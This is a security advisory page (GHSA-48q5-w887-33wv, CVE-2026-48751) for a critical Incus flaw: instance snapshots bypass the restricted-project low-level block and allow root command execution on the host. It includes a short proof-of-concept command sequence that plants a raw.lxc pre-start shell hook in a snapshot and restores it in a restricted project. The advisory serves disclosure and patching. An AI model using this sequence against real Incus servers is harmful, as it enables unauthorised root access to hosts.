GHSA-48q5-w887-33wv

Suggest an improvement
Source
https://github.com/advisories/GHSA-48q5-w887-33wv
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-48q5-w887-33wv/GHSA-48q5-w887-33wv.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-48q5-w887-33wv
Aliases
  • CVE-2026-48751
Published
2026-06-26T18:33:55Z
Modified
2026-06-26T18:45:22.090962610Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
Summary
Incus has a restricted project bypass leading to arbitrary command execution
Details

Summary

Instance snapshots ignore the restricted.containers.lowlevel=block setting; allowing for arbitrary command execution on the Incus server by abusing lowlevel hooks such as raw.lxc and raw.qemu.

Details

Instance snapshots ignore the restricted.containers.lowlevel=block setting; allowing for arbitrary command execution on the Incus server by abusing lowlevel hooks such as raw.lxc and raw.qemu.

As snapshots can be moved from one server to another, a malicious instance+snapshot can be crafted locally, moved to a restricted project and the snapshot restored for arbitrary command execution.

In practice, this allows a malicious actor to execute arbitrary commands on the host with root privileges.

PoC

# remote, restricted
incus project set rem:project restricted.true
incus project set rem:project restricted.containers.lowlevel=block

# locally, unrestricted project
incus init images:debian/trixie rce-raw-lxc
incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id >/lxc-hook-prestart"'
incus snapshot create rce-raw-lxc snap0
#> allow transfer to restricted project
incus config unset rce-raw-lxc raw.lxc

# locally, transfer and trigger
incus move rce-raw-lxc rem: --mode push
incus snapshot restore rem:rce-raw-lxc snap0
incus start rem:rce-raw-lxc

Impact

  • Bypass of project restrictions.
  • Arbitrary command execution on the Incus server.
Database specific 
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T18:33:55Z",
    "severity": "CRITICAL"
}
References

Affected packages

Go / github.com/lxc/incus/v7/cmd/incusd

Package

Name
github.com/lxc/incus/v7/cmd/incusd
View open source insights on deps.dev
Purl
pkg:golang/github.com/lxc/incus/v7/cmd/incusd

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
7.2.0

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-48q5-w887-33wv/GHSA-48q5-w887-33wv.json"